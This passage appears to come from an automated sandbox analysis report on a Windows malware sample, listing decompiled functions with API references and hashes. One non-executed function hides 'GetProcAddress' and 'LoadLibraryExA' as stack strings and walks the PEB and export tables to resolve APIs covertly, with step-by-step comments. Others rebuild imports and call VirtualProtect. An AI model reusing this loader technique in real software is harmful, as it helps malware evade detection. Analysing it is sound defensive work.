                                                                                                                                                      • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00405A26() {
                                                                                                                                                      				struct HINSTANCE__* _t54;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				intOrPtr _t64;
                                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				do {
                                                                                                                                                      					 *((intOrPtr*)(_t100 - 0x10)) =  *((intOrPtr*)(_t100 - 0x10)) + 0x14;
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0xc)) != 0) {
                                                                                                                                                      						_t54 = LoadLibraryExA( *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0xc)), 0, 0); // executed
                                                                                                                                                      						 *(_t100 - 0x1c) = _t54;
                                                                                                                                                      						if( *(_t100 - 0x1c) != 0) {
                                                                                                                                                      							_t71 =  *((intOrPtr*)(_t100 - 0x10));
                                                                                                                                                      							if( *_t71 == 0) {
                                                                                                                                                      								_t55 =  *((intOrPtr*)(_t100 - 0x10));
                                                                                                                                                      								asm("lock mov ecx, [ebp-0xc]");
                                                                                                                                                      								 *(_t100 - 0x18) = _t71 +  *((intOrPtr*)(_t55 + 0x10));
                                                                                                                                                      								 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0x10));
                                                                                                                                                      							} else {
                                                                                                                                                      								 *(_t100 - 0x18) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10))));
                                                                                                                                                      								 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0x10));
                                                                                                                                                      							}
                                                                                                                                                      							while( *( *(_t100 - 0x18)) != 0) {
                                                                                                                                                      								if(( *( *(_t100 - 0x18)) & 0x80000000) == 0) {
                                                                                                                                                      									 *((intOrPtr*)(_t100 - 0x20)) =  *((intOrPtr*)(_t100 - 0xc)) +  *( *(_t100 - 0x18));
                                                                                                                                                      									 *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t100 + 8)) + 0x10))))( *(_t100 - 0x1c),  *((intOrPtr*)(_t100 - 0x20)) + 2);
                                                                                                                                                      								} else {
                                                                                                                                                      									_t64 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t100 + 8)) + 0x10))))( *(_t100 - 0x1c),  *( *(_t100 - 0x18)) & 0x0000ffff);
                                                                                                                                                      									 *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) = _t64;
                                                                                                                                                      								}
                                                                                                                                                      								if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) != 0) {
                                                                                                                                                      									 *(_t100 - 0x18) =  &(( *(_t100 - 0x18))[1]);
                                                                                                                                                      									 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0x14)) + 4;
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									 *(_t100 - 8) = 0;
                                                                                                                                                      								}
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							goto L19;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *(_t100 - 8) = 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L21:
                                                                                                                                                      					return  *(_t100 - 8);
                                                                                                                                                      					L19:
                                                                                                                                                      				} while ( *(_t100 - 8) != 0);
                                                                                                                                                      				goto L21;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00405950
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                      • Instruction ID: c89216279029861e0f2a02b5bb4ee4984ca54bd28e079509e5cd61ee92033d32
                                                                                                                                                      • Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                      • Instruction Fuzzy Hash: E84175B4A0060ADFDB04CF88D891BAEB7B1FF88314F248569D5157B395C734A941CFA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004057F8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
                                                                                                                                                      • Instruction ID: 1067a663c85961089580c26c4081082774dbeea73ac4ade2580fe47cc0d80685
                                                                                                                                                      • Opcode Fuzzy Hash: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
                                                                                                                                                      • Instruction Fuzzy Hash: 0041D974A00619DFDB08CF88D590AADBBF2FB8C314F249259E50AAB394C734AD81DF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A348() {
                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                      				void* _t6;
                                                                                                                                                      
                                                                                                                                                      				RegCloseKey( *(_t6 - 4)); // executed
                                                                                                                                                      				_t4 =  *((intOrPtr*)(_t6 - 8));
                                                                                                                                                      				return _t4;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                      • Instruction ID: 4111118035c4145df5d6207d544e668d3b67a138326457bd21328434b6feecb4
                                                                                                                                                      • Opcode Fuzzy Hash: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                      • Instruction Fuzzy Hash: 0BB09239A00208ABCB28DB94D99896CBBB4EB49211B2002C8FD1957300CA32DE909B50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196B0() {
                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                      
                                                                                                                                                      				EnumWindows(E100193D0, 0);
                                                                                                                                                      				_t2 =  *0x10333dcc; // 0x0
                                                                                                                                                      				return _t2;
                                                                                                                                                      			}




                                                                                                                                                      0x100196ba
                                                                                                                                                      0x100196c0
                                                                                                                                                      0x100196c6

                                                                                                                                                      APIs
                                                                                                                                                      • EnumWindows.USER32(100193D0,00000000), ref: 100196BA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      
                                                                                                                                                      				E10015254();
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}





                                                                                                                                                      0x1000ebd1
                                                                                                                                                      0x1000ebd6
                                                                                                                                                      0x1000ebe2
                                                                                                                                                      0x1000ebe8

                                                                                                                                                      APIs
                                                                                                                                                      • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E00404E19(intOrPtr* _a4, char _a8, char _a12) {
                                                                                                                                                      				void* _v5;
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v10;
                                                                                                                                                      				char _v11;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v13;
                                                                                                                                                      				char _v14;
                                                                                                                                                      				char _v15;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				char _v17;
                                                                                                                                                      				char _v18;
                                                                                                                                                      				char _v19;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _v21;
                                                                                                                                                      				char _v22;
                                                                                                                                                      				char _v23;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v32;
                                                                                                                                                      				char _v34;
                                                                                                                                                      				char _v35;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				char _v37;
                                                                                                                                                      				char _v38;
                                                                                                                                                      				char _v39;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				char _v41;
                                                                                                                                                      				char _v42;
                                                                                                                                                      				char _v43;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v45;
                                                                                                                                                      				char _v46;
                                                                                                                                                      				char _v47;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				char _v56;
                                                                                                                                                      				char _v60;
                                                                                                                                                      				char _v64;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				intOrPtr* _v72;
                                                                                                                                                      				char _v76;
                                                                                                                                                      				char _v80;
                                                                                                                                                      				char _v84;
                                                                                                                                                      				char _v88;
                                                                                                                                                      				char _v92;
                                                                                                                                                      				intOrPtr _t131;
                                                                                                                                                      
                                                                                                                                                      				_v64 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v72 = 0;
                                                                                                                                                      				_v88 = 0;
                                                                                                                                                      				_v60 = 0;
                                                                                                                                                      				_v84 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v80 = 0;
                                                                                                                                                      				_v56 = 0;
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				_v76 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v92 = 0;
                                                                                                                                                      				_v68 = 0;
                                                                                                                                                      				// Stack string built one byte at a time (_v48.._v34): "GetProcAddress"
                                                                                                                                                      				_v48 = 0x47;
                                                                                                                                                      				_v47 = 0x65;
                                                                                                                                                      				_v46 = 0x74;
                                                                                                                                                      				_v45 = 0x50;
                                                                                                                                                      				_v44 = 0x72;
                                                                                                                                                      				_v43 = 0x6f;
                                                                                                                                                      				_v42 = 0x63;
                                                                                                                                                      				_v41 = 0x41;
                                                                                                                                                      				_v40 = 0x64;
                                                                                                                                                      				_v39 = 0x64;
                                                                                                                                                      				_v38 = 0x72;
                                                                                                                                                      				_v37 = 0x65;
                                                                                                                                                      				_v36 = 0x73;
                                                                                                                                                      				_v35 = 0x73;
                                                                                                                                                      				_v34 = 0;
                                                                                                                                                      				// Stack string built one byte at a time (_v24.._v10): "LoadLibraryExA"
                                                                                                                                                      				_v24 = 0x4c;
                                                                                                                                                      				_v23 = 0x6f;
                                                                                                                                                      				_v22 = 0x61;
                                                                                                                                                      				_v21 = 0x64;
                                                                                                                                                      				_v20 = 0x4c;
                                                                                                                                                      				_v19 = 0x69;
                                                                                                                                                      				_v18 = 0x62;
                                                                                                                                                      				_v17 = 0x72;
                                                                                                                                                      				_v16 = 0x61;
                                                                                                                                                      				_v15 = 0x72;
                                                                                                                                                      				_v14 = 0x79;
                                                                                                                                                      				_v13 = 0x45;
                                                                                                                                                      				_v12 = 0x78;
                                                                                                                                                      				_v11 = 0x41;
                                                                                                                                                      				_v10 = 0;
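                                                                                                                                                      				// fs:[0x30] holds the PEB pointer in a 32-bit process
                                                                                                                                                      				_v64 =  *[fs:0x30];
                                                                                                                                                      				// PEB + 0xc: loader data (Ldr)
                                                                                                                                                      				_v28 =  *((intOrPtr*)(_v64 + 0xc));
                                                                                                                                                      				// Ldr + 0x1c: head of the initialization-order module list
                                                                                                                                                      				_v72 =  *((intOrPtr*)(_v28 + 0x1c));
                                                                                                                                                      				// Follow the link to the next list entry
                                                                                                                                                      				_v72 =  *_v72;
                                                                                                                                                      				// Entry + 8: base address of that loaded module
                                                                                                                                                      				_v88 =  *((intOrPtr*)(_v72 + 8));
                                                                                                                                                      				_v60 =  *((intOrPtr*)(_v72 + 0x20));
                                                                                                                                                      				// Return the module base to the caller
                                                                                                                                                      				 *_a4 = _v88;
                                                                                                                                                      				// Module base + 0x3c: e_lfanew, the offset of the PE (NT) headers
                                                                                                                                                      				_v68 =  *((intOrPtr*)(_v88 + 0x3c));
                                                                                                                                                      				// NT headers + 0x78: RVA of the export directory, rebased to a pointer
                                                                                                                                                      				_v84 = _v88 +  *((intOrPtr*)(_v88 + _v68 + 0x78));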
                                                                                                                                                      				_t131 = _v84;
                                                                                                                                                      				_push(_t131);
                                                                                                                                                      				asm("sbb [ecx+0x458bcc55], cl");
                                                                                                                                                      				asm("lodsb");
                                                                                                                                                      				_v52 = _t131 +  *0x000000A7;
                                                                                                                                                      				_v76 = _v88 +  *((intOrPtr*)(_v84 + 0x20));
                                                                                                                                                      				_v92 = _v88 +  *((intOrPtr*)(_v84 + 0x24));
                                                                                                                                                      				_t81 =  &_v24; // 0x4c
                                                                                                                                                      				_v32 = E00404FF9(_v84, _t81);
                                                                                                                                                      				_v8 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
                                                                                                                                                      				_t90 =  &_a8; // 0x61
                                                                                                                                                      				 *((intOrPtr*)( *_t90)) = _v8;
                                                                                                                                                      				_t92 =  &_v48; // 0x47
                                                                                                                                                      				_v32 = E00404FF9( *_t90, _t92);
                                                                                                                                                      				_v80 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
                                                                                                                                                      				_t101 =  &_a12; // 0x4c
                                                                                                                                                      				 *((intOrPtr*)( *_t101)) = _v80;
                                                                                                                                                      				return 1;
                                                                                                                                                      			}

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: A$A$E$G$L$L$P$a$a$b$c$d$d$d$e$e$i$o$o$r$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 0-2414563060
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E004093D5(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				signed char* _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				signed int _v44;
                                                                                                                                                      				signed int _v48;
                                                                                                                                                      				signed int _v52;
                                                                                                                                                      				signed int _v58;
                                                                                                                                                      				signed int _v62;
                                                                                                                                                      				signed int _v66;
                                                                                                                                                      				signed int _v68;
                                                                                                                                                      				char _v73;
                                                                                                                                                      				char _v96;
                                                                                                                                                      				signed int _t121;
                                                                                                                                                      				intOrPtr _t141;
                                                                                                                                                      				intOrPtr _t143;
                                                                                                                                                      				signed int _t146;
                                                                                                                                                      				intOrPtr* _t148;
                                                                                                                                                      
                                                                                                                                                      				_t148 = _a12;
                                                                                                                                                      				_v16 =  &_v96;
                                                                                                                                                      				_t121 = 0;
                                                                                                                                                      				_t146 = 1;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v28 = _t146;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_v48 = 0;
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_a12 = _t148;
                                                                                                                                                      				L1:
                                                                                                                                                      				_t143 =  *_t148;
                                                                                                                                                      				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
                                                                                                                                                      					_t148 = _t148 + 1;
                                                                                                                                                      					goto L1;
                                                                                                                                                      				}
                                                                                                                                                      				_push(4);
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L7:
                                                                                                                                                      					_t141 =  *_t148;
                                                                                                                                                      					_t148 = _t148 + 1;
                                                                                                                                                      					if(_t121 > 0xb) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					switch( *((intOrPtr*)(_t121 * 4 +  &M00409876))) {
                                                                                                                                                      						case 0:
                                                                                                                                                      							__eflags = _t141 - 0x31;
                                                                                                                                                      							if(_t141 < 0x31) {
                                                                                                                                                      								L12:
                                                                                                                                                      								__eflags = _t141 -  *0x40ff24; // 0x2e
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x40ff20 - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x40ff24; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x40ff20 - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x40fd10; // 0x40fd1a
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
                                                                                                                                                      							__eflags =  *0x40ff20 - __edx;
                                                                                                                                                      							_v40 = __edx;
                                                                                                                                                      							if( *0x40ff20 <= __edx) {
                                                                                                                                                      								__ecx =  *0x40fd10; // 0x40fd1a
                                                                                                                                                      								__eax = __bl & 0x000000ff;
                                                                                                                                                      								__eax = __bl & 0x000000ff & __esi;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eax = __bl & 0x000000ff;
                                                                                                                                                      								__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
                                                                                                                                                      								_pop(__ecx);
                                                                                                                                                      								_pop(__ecx);
                                                                                                                                                      								_push(1);
                                                                                                                                                      								_pop(__edx);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								goto L94;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eax = __esi;
                                                                                                                                                      								goto L82;
                                                                                                                                                      							}
                                                                                                                                                      						case 6:
                                                                                                                                                      							_t51 = __edi - 2; // 0x0
                                                                                                                                                      							__ecx = _t51;
                                                                                                                                                      							__eflags = __bl - 0x31;
                                                                                                                                                      							_a12 = __ecx;
                                                                                                                                                      							if(__bl < 0x31) {
                                                                                                                                                      								L68:
                                                                                                                                                      								__eax = __bl;
                                                                                                                                                      								__eax = __bl - 0x2b;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									goto L89;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = __eax - 1;
                                                                                                                                                      								__eax = __eax - 1;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									goto L88;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = __eax - 3;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax != 0) {
                                                                                                                                                      									goto L110;
                                                                                                                                                      								}
                                                                                                                                                      								goto L71;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = __bl - 0x39;
                                                                                                                                                      							if(__bl <= 0x39) {
                                                                                                                                                      								goto L80;
                                                                                                                                                      							}
                                                                                                                                                      							goto L68;
                                                                                                                                                      						case 7:
                                                                                                                                                      							__eflags = __bl - 0x31;
                                                                                                                                                      							if(__bl < 0x31) {
                                                                                                                                                      								L83:
                                                                                                                                                      								__eflags = __bl - 0x30;
                                                                                                                                                      								if(__bl != 0x30) {
                                                                                                                                                      									L94:
                                                                                                                                                      									__edi = _a12;
                                                                                                                                                      									goto L111;
                                                                                                                                                      								}
                                                                                                                                                      								L71:
                                                                                                                                                      								_push(8);
                                                                                                                                                      								goto L90;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = __bl - 0x39;
                                                                                                                                                      							if(__bl > 0x39) {
                                                                                                                                                      								goto L83;
                                                                                                                                                      							}
                                                                                                                                                      							goto L80;
                                                                                                                                                      						case 8:
                                                                                                                                                      							_v36 = __edx;
                                                                                                                                                      							while(1) {
                                                                                                                                                      								__eflags = __bl - 0x30;
                                                                                                                                                      								if(__bl != 0x30) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__bl =  *__edi;
                                                                                                                                                      								__edi = __edi + 1;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = __bl - 0x31;
                                                                                                                                                      							if(__bl < 0x31) {
                                                                                                                                                      								goto L109;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = __bl - 0x39;
                                                                                                                                                      							if(__bl > 0x39) {
                                                                                                                                                      								goto L109;
                                                                                                                                                      							}
                                                                                                                                                      							L80:
                                                                                                                                                      							_push(9);
                                                                                                                                                      							L81:
                                                                                                                                                      							_pop(_t121);
                                                                                                                                                      							L82:
                                                                                                                                                      							_t148 = _t148 - 1;
                                                                                                                                                      							goto L7;
                                                                                                                                                      						case 9:
                                                                                                                                                      							_v36 = 1;
                                                                                                                                                      							__esi = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							while(1) {
                                                                                                                                                      								__eflags =  *0x40ff20 - 1;
                                                                                                                                                      								if( *0x40ff20 <= 1) {
                                                                                                                                                      									__ecx =  *0x40fd10; // 0x40fd1a
